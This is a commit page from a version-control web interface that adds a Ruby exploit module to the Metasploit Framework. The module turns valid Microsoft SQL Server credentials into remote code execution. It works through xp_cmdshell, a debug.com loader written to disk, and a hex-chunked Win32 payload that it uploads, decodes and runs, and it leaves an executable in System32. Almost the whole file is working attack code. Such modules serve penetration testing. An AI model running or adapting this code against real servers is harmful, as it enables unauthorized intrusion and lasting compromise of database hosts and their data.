Adds ReL1K's mssql_payload module
git-svn-id: file:///home/svn/framework3/trunk@7162 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
3b49e2af58
commit
59676df4db
|
@ -0,0 +1,99 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server Payload Execution',
|
||||
'Description' => %q{
|
||||
This module will execute an arbitrary payload on a Microsoft SQL
|
||||
Server, using the Windows debug.com method for writing an executable to disk
|
||||
and the xp_cmdshell stored procedure. File size restrictions are avoided by
|
||||
incorporating the debug bypass method presented at Defcon 17 by SecureState.
|
||||
Note that this module will leave a metasploit payload in the Windows
|
||||
System32 directory which must be manually deleted once the attack is completed.
|
||||
},
|
||||
'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options( [
|
||||
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
|
||||
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
|
||||
])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
var_bypass = rand_text_alpha(8)
|
||||
var_payload = rand_text_alpha(8)
|
||||
|
||||
debug = false # enable to see the output
|
||||
|
||||
if(not mssql_login_datastore)
|
||||
print_status("Invalid SQL Server credentials")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Warning: This exploit will leave #{var_payload}.exe in the System32 directory of the target")
|
||||
|
||||
hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]
|
||||
|
||||
print_status("Writing the debug.com loader to the disk...")
|
||||
h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
|
||||
h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
|
||||
h2b.split(/\n/).each do |line|
|
||||
mssql_xpcmdshell("#{line}", false)
|
||||
end
|
||||
|
||||
print_status("Converting the debug script to an executable...")
|
||||
mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
|
||||
mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)
|
||||
|
||||
print_status("Uploading the payload, please be patient...")
|
||||
idx = 0
|
||||
cnt = 500
|
||||
while(idx < hex.length - 1)
|
||||
mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
|
||||
idx += cnt
|
||||
end
|
||||
|
||||
print_status("Converting the encoded payload...")
|
||||
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
|
||||
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
|
||||
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
|
||||
|
||||
print_status("Executing the payload...")
|
||||
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue